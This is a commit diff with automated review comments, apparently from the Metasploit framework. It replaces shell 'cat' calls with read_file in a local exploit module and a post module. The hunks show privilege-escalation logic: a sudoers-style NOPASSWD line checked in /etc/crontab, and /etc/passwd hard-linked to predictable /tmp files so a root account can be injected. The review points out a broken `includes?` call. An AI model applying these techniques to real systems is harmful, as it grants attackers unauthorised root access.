Land #7377, read_file for some modules
commit
bcb040c1ac
|
@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
def shemsham_installed?()
|
||||
# we want this to be false.
|
||||
vprint_status('Checking if shem or sham are installed')
|
||||
shemsham = cmd_exec('cat /proc/cpuinfo')
|
||||
shemsham = read_file('/proc/cpuinfo')
|
||||
if shemsham.include?('shem')
|
||||
print_error('shem installed, system not vulnerable.')
|
||||
elsif shemsham.include?('sham')
|
||||
|
|
|
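Review bot: The result of `read_file('/proc/cpuinfo')` is used without a nil guard, and the next line calls `shemsham.include?('shem')` on it. The replaced `cmd_exec('cat …')` call would normally hand back a string even when the command failed, whereas `read_file` appears able to return nil on some session types when the read fails (worth confirming against the File mixin), so a failed read would surface as a NoMethodError rather than a clean result. Coercing the value, e.g. `shemsham = read_file('/proc/cpuinfo').to_s`, keeps the old behaviour; the same applies to the `/etc/crontab` read in the next file and to the `/etc/passwd` reads in the post module. The body of `shemsham_installed?` continues outside the hunk, and which of the doubled lines is the new side is inferred from the commit title.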
@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
vprint_status("Now to check whether the script worked...")
|
||||
|
||||
# Check whether it worked
|
||||
crontab = cmd_exec("cat /etc/crontab")
|
||||
crontab = read_file("/etc/crontab")
|
||||
vprint_status("Reading crontab yielded the following response: #{crontab}")
|
||||
unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
|
||||
vprint_error("Bad news... it did not write to the file.")
|
||||
|
|
|
@ -63,7 +63,7 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
def run
|
||||
print_status "Setting up the victim's /tmp dir"
|
||||
initial_size = cmd_exec("cat /etc/passwd | wc -l")
|
||||
initial_size = read_file("/etc/passwd").lines.count
|
||||
print_status "/etc/passwd is currently #{initial_size} lines long"
|
||||
i = 0
|
||||
j = 0
|
||||
|
@ -75,7 +75,7 @@ class MetasploitModule < Msf::Post
|
|||
print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
|
||||
cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
|
||||
end
|
||||
current_size = cmd_exec("cat /etc/passwd | wc -l")
|
||||
current_size = read_file("/etc/passwd").lines.count
|
||||
if current_size == initial_size
|
||||
# PCAP is flowing
|
||||
pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
|
||||
|
@ -92,7 +92,7 @@ class MetasploitModule < Msf::Post
|
|||
i = (i+1) % 60 # increment second counter
|
||||
end
|
||||
|
||||
if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
|
||||
if read_file("/etc/passwd").includes?("Metasploit")
|
||||
print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
|
||||
# TODO: Consider recording our now-created username and password as a valid credential here.
|
||||
else
|
||||
|
|
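Review bot: `includes?` is not a method on Ruby's String, so `read_file("/etc/passwd").includes?("Metasploit")` in the last hunk raises NoMethodError instead of evaluating the check; it should read `if read_file("/etc/passwd").include?("Metasploit")`. As written, the module would abort at the verification step and reach neither the success nor the failure branch. Separately, `initial_size` and `current_size` change from the string output of `wc -l` to an Integer from `.lines.count`; both sides of the comparison change together so the equality test still holds, but a short comment such as `# Integer line count, not the raw wc output` would make the type change explicit. `run` starts and ends outside these hunks.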